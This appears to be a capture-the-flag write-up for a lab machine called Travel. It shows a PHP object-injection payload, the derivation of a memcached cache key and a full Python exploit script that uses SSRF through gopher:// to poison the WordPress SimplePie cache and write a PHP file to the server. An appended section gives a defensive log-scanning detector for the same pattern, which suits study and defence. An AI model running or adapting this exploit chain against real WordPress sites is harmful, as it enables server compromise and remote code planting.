Mr_hEx

Travel Box !

Jul 28th, 2020
PHP Object Injection !!!

Code :

<?php
class TemplateHelper{

    public $file = "h3x.php";
    public $data = "<?php echo 'Mr_hex :( '; ";
}

print serialize(new TemplateHelper);

?>

#OutPut :
O:14:"TemplateHelper":2:{s:4:"file";s:7:"h3x.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}

Let's set a value in memcached !!
set xct_4e5612ba079c530a6b1f148c0b352241 4 0
The key is the cache prefix (xct_) followed by a hash.
Look at this link !
https://github.com/WordPress/WordPress/blob/master/wp-includes/SimplePie/Cache/Memcached.php#L84
'prefix' => 'simplepie_' by default !!
In this script the prefix is xct_ ; look at rss_template.php :
$simplepie->set_cache_location('memcache://127.0.0.1:11211/?timeout=60&prefix=xct_');

The hash part is 4e5612ba079c530a6b1f148c0b352241, derived from the feed URL like this :
http://www.travel.htb/newsfeed/customfeed.xml => md5 => 3903a76d1e6fef0d76e973a0561cbfc0
3903a76d1e6fef0d76e973a0561cbfc0:spc => md5 => 4e5612ba079c530a6b1f148c0b352241

Let's see here :
https://github.com/tarunkant/Gopherus/blob/master/scripts/PHPMemcached.py
payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
Here SpyD3r = xct_4e5612ba079c530a6b1f148c0b352241
code = O:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}
str(len(code)) = the length of code
payload = "_%0d%0aset%20xct_4e5612ba079c530a6b1f148c0b352241%204%200%2095%0d%0aO:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}%0d%0a"
Replace "+" with "%20" and "%25" with "%".

Then let's set the value through the SSRF.
There are a lot of ways to bypass an SSRF filter !
Read here : https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
We'll use the gopher wrapper :
https://github.com/tarunkant/Gopherus

Python Script !

import requests
from urllib.parse import quote_plus  # Python 3 ; the original used Python 2's urllib.quote_plus

url = "http://blog.travel.htb/"
code = """O:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";s:4:"data";s:25:"<?php echo 'Mr_hex :( '; ";}"""
# memcached "set <key> <flags> <exptime> <bytes>" followed by the data line
payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
encodPayload = quote_plus(payload).replace("+", "%20").replace("%25", "%")
exploit = "gopher://0:11211/_{}".format(encodPayload)

print("[+] Trying to inject payload !!")

ssrf_url = url + "awesome-rss/?debug=yes&custom_feed_url=" + exploit
print("[+] {}".format(ssrf_url))
r = requests.get(ssrf_url)

# load the feed page again so the poisoned cache entry is read back
r = requests.get(url + "awesome-rss/")
check_shell = url + "wp-content/themes/twentytwenty/logs/hex.php"

r_check = requests.get(check_shell)
if r_check.status_code == 200:
    print("[+] Your php shell : {}".format(check_shell))
else:
    print("[-] something went wrong !!")

print("[+] Have a Good Time ):")

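A defender-side check, added here as an example and not part of the original paste: it reads web-server access-log lines (constructed samples, embedded below) and flags a custom_feed_url that points gopher:// at memcached with a set command whose data is a serialized PHP object, which is exactly the pattern the script above sends. The function and sample names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote, quote

GOPHER = re.compile(r"^gopher://([^/]+)/_?(.*)$", re.DOTALL)
MEMCACHED_SET = re.compile(r"^set (\S+) (\d+) (\d+) (\d+)$")
PHP_OBJECT = re.compile(r'^O:\d+:"(\w+)":\d+:\{')

def inspect_feed_request(log_line):
    """Finding dict if custom_feed_url is a gopher:// memcached write, else None."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', log_line)
    if not m:
        return None
    # parse_qs decodes the value once, as PHP's $_GET does for the plugin
    feed = parse_qs(urlsplit(m.group(1)).query).get("custom_feed_url", [""])[0]
    g = GOPHER.match(feed)
    if not g:
        return None
    # The gopher wrapper decodes the path a second time; unquote() is a no-op
    # on raw CRLF, so single- and double-encoded payloads are both handled.
    lines = unquote(g.group(2)).split("\r\n")
    finding = {"client": log_line.split()[0], "target": g.group(1),
               "sets": [], "php_class": None}
    for i, line in enumerate(lines):
        cmd = MEMCACHED_SET.match(line)
        if not cmd:
            continue
        data = lines[i + 1] if i + 1 < len(lines) else ""
        finding["sets"].append({"key": cmd.group(1), "declared": int(cmd.group(4)),
                                "actual": len(data.encode())})
        obj = PHP_OBJECT.match(data)
        if obj:  # stored value is a serialized PHP object: unserialize() gadget
            finding["php_class"] = obj.group(1)
    return finding

def scan(lines):
    return [f for f in map(inspect_feed_request, lines) if f]

# Constructed sample access-log lines (not from the original post): a normal
# feed fetch and a request carrying the page's memcached payload via gopher://.
SERIALIZED = ('O:14:"TemplateHelper":2:{s:4:"file";s:7:"hex.php";'
              's:4:"data";s:25:"<?php echo \'Mr_hex :( \'; ";}')
_raw = f"\r\nset xct_4e5612ba079c530a6b1f148c0b352241 4 0 {len(SERIALIZED)}\r\n{SERIALIZED}\r\n"
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Jul/2020:10:00:01 +0000] "GET /awesome-rss/?custom_feed_url='
    + quote("http://www.travel.htb/newsfeed/customfeed.xml", safe="") + ' HTTP/1.1" 200 512',
    '10.0.0.9 - - [28/Jul/2020:10:00:07 +0000] "GET /awesome-rss/?debug=yes&custom_feed_url='
    + "gopher://0:11211/_" + quote(_raw, safe="") + ' HTTP/1.1" 200 220',
]
```

A mismatch between "declared" and "actual" in a finding means the memcached frame was malformed and the write most likely failed, which is still worth alerting on.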